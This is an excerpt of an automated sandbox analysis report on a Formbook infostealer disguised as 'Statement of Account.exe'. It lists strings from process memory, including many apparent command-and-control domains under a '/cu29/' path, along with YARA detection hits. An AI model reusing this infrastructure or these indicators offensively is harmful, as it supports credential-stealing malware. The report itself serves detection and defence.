          Source: explorer.exe, 00000007.00000000.1743570907.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3493890657.0000000009836000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4171222123.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3107810186.0000000009836000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000007.00000000.1743570907.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3493890657.0000000009836000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4171222123.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3107810186.0000000009836000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000007.00000000.1743570907.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3493890657.0000000009836000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4171222123.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3107810186.0000000009836000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000007.00000002.4168419021.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000007.00000002.4170599485.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1750978352.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4170037093.0000000007F40000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
          Source: Statement of Account.exe, 00000000.00000002.1730151288.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, SIZfuXT.exe, 00000008.00000002.1767337995.00000000032B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.achhonglan.shop
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.achhonglan.shop/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.achhonglan.shop/cu29/www.usinessaviationconsulting.net
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.achhonglan.shopReferer:
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.azino-forum-pro.online
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.azino-forum-pro.online/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.azino-forum-pro.online/cu29/www.sed-cars-89003.bond
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.azino-forum-pro.onlineReferer:
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eb777.club
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eb777.club/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eb777.club/cu29/www.irex.info
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eb777.clubReferer:
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-bridges-87553.bond
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-bridges-87553.bond/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-bridges-87553.bond/cu29/.
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ental-bridges-87553.bondReferer:
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f6b-crxy.top
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f6b-crxy.top/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f6b-crxy.top/cu29/www.hopp9.top
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.f6b-crxy.topReferer:
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hopp9.top
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hopp9.top/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hopp9.top/cu29/www.ohns.app
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hopp9.topReferer:
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.irex.info
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.irex.info/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.irex.info/cu29/www.urgaslotvip.website
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.irex.infoReferer:
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kdsclci.bond
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kdsclci.bond/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kdsclci.bond/cu29/www.leachlondonstore.online
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kdsclci.bondReferer:
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leachlondonstore.online
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leachlondonstore.online/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leachlondonstore.online/cu29/www.f6b-crxy.top
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leachlondonstore.onlineReferer:
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nd-los.net
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nd-los.net/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nd-los.net/cu29/www.azino-forum-pro.online
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nd-los.netReferer:
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ohns.app
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ohns.app/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ohns.app/cu29/www.achhonglan.shop
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ohns.appReferer:
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmp, Statement of Account.exe, 00000000.00000002.1732834215.0000000005FA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sed-cars-89003.bond
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sed-cars-89003.bond/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sed-cars-89003.bond/cu29/www.kdsclci.bond
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sed-cars-89003.bondReferer:
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.srtio.xyz
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.srtio.xyz/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.srtio.xyz/cu29/www.eb777.club
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.srtio.xyzReferer:
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urgaslotvip.website
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urgaslotvip.website/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urgaslotvip.website/cu29/www.nd-los.net
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.urgaslotvip.websiteReferer:
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.usinessaviationconsulting.net
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.usinessaviationconsulting.net/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.usinessaviationconsulting.net/cu29/www.ental-bridges-87553.bond
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.usinessaviationconsulting.netReferer:
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yzq0n.top
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yzq0n.top/cu29/
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yzq0n.top/cu29/www.srtio.xyz
          Source: explorer.exe, 00000007.00000002.4172022739.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3106191723.00000000098E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yzq0n.topReferer:
          Source: Statement of Account.exe, 00000000.00000002.1732896393.0000000007072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000007.00000000.1754971780.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3107482777.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000007.00000002.4168419021.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000007.00000002.4168419021.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000007.00000000.1754971780.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000007.00000002.4171222123.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3108248750.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1743570907.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000007.00000002.4171222123.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3108248750.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1743570907.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000007.00000002.4166544194.000000000370D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4164952782.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1732420107.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1733787434.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000007.00000002.4171222123.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3108248750.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1743570907.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000007.00000002.4171222123.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3108248750.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1743570907.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000007.00000002.4171222123.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3108248750.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1743570907.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000007.00000000.1738610372.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4168419021.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV

          E-Banking Fraud

          Source: Yara match; File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
